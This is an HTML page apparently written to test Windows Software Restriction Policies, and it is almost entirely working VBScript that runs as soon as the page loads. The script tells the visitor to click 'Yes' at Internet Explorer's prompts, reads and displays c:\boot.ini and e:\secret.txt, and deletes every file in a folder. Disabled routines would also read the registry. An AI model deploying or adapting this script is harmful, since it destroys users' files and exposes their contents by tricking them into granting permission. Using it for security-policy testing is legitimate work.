<html>
<head>
<title>Example WinSafer Html script</title>
</head>
<body>
<h1>Example WinSafer Html script</h1>
<script language="vbscript">
msgbox("Hello friend, please press 'Yes' when Internet Explorer asks you a question!")
</script>
<table bgcolor="#cccc99" border=3>
<tr><th>Script output is below:</th></tr>
<tr><td bgcolor="#eeeeaa">
<script language="vbscript">
Option Explicit
const filename1 = "c:\boot.ini"
const filename2 = "e:\secret.txt"
const foldername1 = "e:\spam"
document.write("Howdy. I am a malicious script.<br>")
document.write("<hr>")
call ReadTheFile(filename1)
document.write("<hr>")
call ReadTheFile(filename2)
document.write("<hr>")
rem call DisplaySpecialFolders
rem document.write("<hr>")
rem call ReadTheRegistry
rem document.write("<hr>")
call DeleteFiles(foldername1)
sub ReadTheRegistry
On error resume next
dim wscr, rr
set wscr = CreateObject("WScript.Shell")
set rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EmailName")
document.write("Read the registry: " & rr)
end sub
Sub ReadTheFile(filename)
On error resume next
dim fso, fileinput, linetext
Set fso = CreateObject("Scripting.FileSystemObject")
Err.Clear
set fileinput = fso.OpenTextFile(filename,1)
if (Err.Number <> 0) then
document.write("I failed to open the file <B>" & filename & "</B> for reading: " & Err.Description & "<br>")
else
linetext = fileinput.ReadAll
fileinput.Close
document.write("I just read the file <B>" & filename & "</B> and it contained:<br><pre>" & linetext & "</pre><br>")
End if
End Sub
Sub DeleteFiles(foldername)
On error resume next
dim fso, Folder, Files, File, filecount
Set fso = CreateObject("Scripting.FileSystemObject")
document.write("<ul>")
document.write("<li>Going to delete all files from " & foldername)
Err.Clear
set Folder = fso.GetFolder(foldername)
if (Err.Number <> 0) then
document.write("<li>Failed to access <B>" & foldername & "</b>: " & Err.Description)
else
set files = Folder.Files
if (Err.Number <> 0) then
document.write("<li>Failed to access <B>" & foldername & "</b>: " & Err.Description)
else
filecount = Files.Count
if Err.Number <> 0 then
document.write("<li>Failed to access folder: " & Err.Description)
else
document.write("<li>There are " & CStr(filecount) & " files within <b>" & foldername & "</b>")
for each File in Files
Err.Clear
document.write("<li>" & File.Path)
if (Err.Number <> 0) then
document.write("<li>Failed to delete files: " & Err.Description)
else
Err.Clear
FSO.DeleteFile(File.Path)
if (Err.Number <> 0) then
document.write(": failed to delete, " & Err.Description)
else
document.write(": <B>successfully deleted!!</B>")
end if
end if
Next
end if
end if
end if
document.write("</ul>")
end sub
sub DisplaySpecialFolders
On error resume next
dim fso, dirwin, dirsystem, dirtemp
Set fso = CreateObject("Scripting.FileSystemObject")
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
document.write("Your Windows directory is: " & dirwin & "<br>")
document.write("Your System directory is: " & dirsystem & "<br>")
document.write("Your Temporary directory is: " & dirtemp & "<br>")
rem Interestingly enough, when running in an untrusted level,
rem the vbscript fails to be able to determine the user's
rem personal temporary directory.
end sub
</script>
</td></tr></table>
</body>
</html>